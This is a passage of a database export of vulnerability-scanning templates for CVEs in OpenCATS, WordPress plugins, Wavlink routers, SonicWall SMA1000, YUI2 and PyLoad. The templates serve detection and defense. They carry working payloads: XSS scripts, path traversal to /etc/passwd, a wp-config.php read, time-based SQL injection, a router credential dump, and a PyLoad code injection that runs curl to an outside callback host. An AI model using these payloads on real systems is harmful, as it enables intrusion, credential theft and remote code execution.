\"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 500\n# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950", "hash": "29ee889767633744ea0f2912461d3233", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e4" }, "name": "CVE-2022-48012.yaml", "content": "id: CVE-2022-48012\n\ninfo:\n name: OpenCATS 0.9.7 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.\n reference:\n - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities\n - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities/blob/main/Opencats-0.9.7-Reflected%20XSS%20in%20onChangeTag.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48012\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-48012\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43742\n cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: opencats\n product: opencats\n shodan-query: title:\"opencats\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n tag_title=\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"opencats - Login\")\n - contains(body_3, \"\")\n condition: and\n# digest: 
4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950", "hash": "ed38b8a07ffb6b958a70c061aca65e39", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e5" }, "name": "CVE-2022-48165.yaml", "content": "id: CVE-2022-48165\n\ninfo:\n name: Wavlink - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n impact: |\n The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE\n - https://twitter.com/For3stCo1d/status/1622576544190464000\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165\n - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48165\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-48165\n cwe-id: CWE-284\n epss-score: 0.04111\n epss-percentile: 0.9131\n cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530h4_firmware\n shodan-query: http.favicon.hash:-1350437236\n tags: cve2022,cve,wavlink,router,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportLogs.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Password='\n - 'Login='\n condition: and\n\n - type: 
word\n part: header\n words:\n - filename=\"sysLogs.txt\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'Password=([^\\s]+)'\n# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950", "hash": "e94877f822a456e9631302dc6f4c1e8b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e6" }, "name": "CVE-2022-48197.yaml", "content": "id: CVE-2022-48197\n\ninfo:\n name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: |\n Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/51198\n - https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48197\n - http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html\n - https://github.com/ryan412/CVE-2022-48197/blob/main/README.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-48197\n cwe-id: CWE-79\n epss-score: 0.0012\n epss-percentile: 0.45243\n cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 9\n vendor: yui_project\n product: yui\n shodan-query: html:\"bower_components/yui2/\"\n tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"1'\\\"()&%\"\n - \"widget.TreeView\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f7c3d9fc5175b9363d49c28f2e0b92b6fe9f8abc45059059ad0dafba85fea07f022100fb41b72abfbecfa5569be46ea5a0b6291531324d31b317b2be2d9e4e7a366e13:922c64590222798bb761d5b6d8e72950", "hash": "ed5becdae4247f20a7f031907c2a7bdf", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { 
"$oid": "66477a413521042ccf3085e7" }, "name": "CVE-2022-4897.yaml", "content": "id: CVE-2022-4897\n\ninfo:\n name: WordPress BackupBuddy <8.8.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress BackupBuddy plugin before 8.8.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 8.8.3.\n reference:\n - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4897\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4897\n cwe-id: CWE-79\n epss-score: 0.00289\n epss-percentile: 0.65597\n cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ithemes\n product: backupbuddy\n framework: wordpress\n tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, 
\"onload=alert(document.domain)\")'\n - 'contains(body_2, \"BackupBudddy iFrame\")'\n condition: and\n# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950", "hash": "72b1ed53fa001f0fc0ee8cc278529286", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e8" }, "name": "CVE-2023-0099.yaml", "content": "id: CVE-2023-0099\n\ninfo:\n name: Simple URLs < 115 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.\n remediation: Fixed in version 115\n reference:\n - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8\n - https://wordpress.org/plugins/simple-urls/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0099\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0099\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: getlasso\n product: simple_urls\n framework: wordpress\n tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body, \"\")'\n - 'contains(body_2, \"search_term\")'\n condition: and\n# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950", "hash": "2e093771a57cb5eb5d4ef0182f3d66a3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e9" }, "name": "CVE-2023-0126.yaml", "content": "id: CVE-2023-0126\n\ninfo:\n name: SonicWall SMA1000 LFI\n author: tess\n severity: high\n description: |\n Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0126\n - https://github.com/advisories/GHSA-mr28-27qx-phg3\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001\n - https://github.com/Gerxnox/One-Liner-Collections\n - https://github.com/thecybertix/One-Liner-Collections\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-0126\n cwe-id: CWE-22\n epss-score: 0.34658\n epss-percentile: 0.96997\n cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: sonicwall\n product: sma1000_firmware\n shodan-query: title:\"Appliance Management Console Login\"\n tags: cve2023,cve,sonicwall,lfi,sma1000\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - content/unknown\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950", "hash": "338f5d74a6c324400cb910c7519468ac", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ea" }, "name": "CVE-2023-0159.yaml", "content": "id: CVE-2023-0159\n\ninfo:\n name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE\n author: c4sper0\n severity: high\n description: |\n The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. 
This may be escalated to RCE using PHP filter chains.\n remediation: Fixed in 1.9.1\n reference: |\n - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/\n - https://github.com/im-hanzou/EVCer\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/xu-xiang/awesome-security-vul-llm\n - https://wordpress.org/plugins/extensive-vc-addon/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-0159\n epss-score: 0.00199\n epss-percentile: 0.56869\n cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n vendor: wprealize\n product: extensive_vc_addons_for_wpbakery_page_builder\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/extensive-vc-addon/\"\n tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950", "hash": "6f5ef30253c87933cf8e282b1eb51e72", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085eb" }, "name": "CVE-2023-0236.yaml", "content": "id: CVE-2023-0236\n\ninfo:\n name: WordPress Tutor LMS <2.0.10 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. 
The plugin does not sanitize and escape the reset_key and user_id parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.0.10.\n reference:\n - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0236\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0236\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: themeum\n product: tutor_lms\n framework: wordpress\n tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Instructor Registration\")'\n condition: and\n# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950", "hash": 
"9a256f8ffb1a89c12e7d86c89b4b9680", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ec" }, "name": "CVE-2023-0261.yaml", "content": "id: CVE-2023-0261\n\ninfo:\n name: WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation.\n remediation: Fixed in version 10.8.\n reference:\n - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\n - https://wordpress.org/plugins/wp-tripadvisor-review-slider/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0261\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-0261\n cwe-id: CWE-89\n epss-score: 0.0753\n epss-percentile: 0.93501\n cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ljapps\n product: wp_tripadvisor_review_slider\n framework: wordpress\n tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n 
@timeout: 10s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n content-type: application/x-www-form-urlencoded\n\n action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"\\\"data\\\":{\")'\n condition: and\n# digest: 4a0a0047304502202cba63b19032eacb33e98f8c5b149b35ccef086fb44efb66696ab7a8c09d0435022100f4c8796c3c0aeaa9cc5d323fa7fcd5cfabcd35a46c056dd4c8a4b95b71032a1a:922c64590222798bb761d5b6d8e72950", "hash": "9bf42b6152fdd98d8de5391aa2c65107", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ed" }, "name": "CVE-2023-0297.yaml", "content": "id: CVE-2023-0297\n\ninfo:\n name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)\n author: MrHarshvardhan,DhiyaneshDk\n severity: critical\n description: |\n Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.\n remediation: |\n Upgrade PyLoad to a version that is not affected by this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/51532\n - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-1058\n - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html\n - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0297\n cwe-id: CWE-94\n epss-score: 0.35807\n epss-percentile: 0.96764\n cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pyload\n product: pyload\n shodan-query: html:\"pyload\"\n zoomeye-query: 
app:\"pyLoad\"\n tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast\nvariables:\n cmd: \"curl {{interactsh-url}}\"\n\nhttp:\n - raw:\n - |\n GET /flash/addcrypted2 HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /flash/addcrypted2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - 'JDownloader'\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n# digest: 4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950", "hash": "566ca2bd30e045cdbb46cb90a958befb", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ee" }, "name": "CVE-2023-0334.yaml", "content": "id: CVE-2023-0334\n\ninfo:\n name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\n remediation: Fixed in version 3.6.3\n reference:\n - https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0334\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0334\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40094\n cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: shortpixel\n product: shortpixel_adaptive_images\n framework: wordpress\n publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/\n tags: 
cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"shortpixel\") && contains(body, \"\")'\n condition: and\n# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950", "hash": "ebebe0ed1bc0fc24d47671d456c117ee", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ef" }, "name": "CVE-2023-0448.yaml", "content": "id: CVE-2023-0448\n\ninfo:\n name: WP Helper Lite < 4.3 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 4.3 and above\n reference:\n - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0448\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0448\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: matbao\n product: wp_helper_premium\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wp-helper-lite\"\n tags: 
cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \">\")'\n - 'contains(body, \"params\\\":{\\\"action\")'\n condition: and\n# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950", "hash": "70276ad9d303042ea778fca2d8b0e6be", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f0" }, "name": "CVE-2023-0514.yaml", "content": "id: CVE-2023-0514\n\ninfo:\n name: Membership Database <= 1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
